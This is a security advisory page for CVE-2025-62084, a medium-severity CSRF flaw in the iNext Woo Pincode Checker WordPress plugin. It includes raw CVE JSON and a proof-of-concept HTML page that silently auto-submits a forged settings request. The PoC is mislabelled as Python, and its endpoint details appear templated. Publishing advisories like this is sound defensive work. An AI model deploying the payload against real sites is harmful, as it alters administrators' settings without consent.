Security Vulnerability Report
中文
CVE-2025-62084 CVSS 4.3 MEDIUM

CVE-2025-62084

Published: 2025-12-31 16:15:44
Last Modified: 2026-04-23 15:34:31

Description

Cross-Site Request Forgery (CSRF) vulnerability in Imdad Next Web iNext Woo Pincode Checker inext-woo-pincode-checker allows Cross Site Request Forgery.This issue affects iNext Woo Pincode Checker: from n/a through <= 2.3.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

iNext Woo Pincode Checker <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62084 --> <!-- Target: WordPress with iNext Woo Pincode Checker Plugin <= 2.3.1 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>CSRF PoC - Modify Pincode Settings</h1> <p>This PoC demonstrates the CSRF vulnerability in iNext Woo Pincode Checker plugin.</p> <!-- Auto-submit form targeting the vulnerable plugin endpoint --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="inext_save_pincode"> <input type="hidden" name="pincode_data" value="attacker_controlled_data"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Alternative: Use fetch API to send request fetch('http://target-site.com/wp-admin/admin-post.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=inext_save_pincode&pincode_data=malicious_data' }); </script> <p>If successful, the pincode settings will be modified without user's knowledge.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62084", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:44.130", "lastModified": "2026-04-23T15:34:30.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Imdad Next Web iNext Woo Pincode Checker inext-woo-pincode-checker allows Cross Site Request Forgery.This issue affects iNext Woo Pincode Checker: from n/a through <= 2.3.1."}, {"lang": "es", "value": "La vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Imdad Next Web iNext Woo Pincode Checker permite la falsificación de petición en sitios cruzados. Este problema afecta a iNext Woo Pincode Checker: desde n/a hasta 2.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/inext-woo-pincode-checker/vulnerability/wordpress-inext-woo-pincode-checker-plugin-2-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}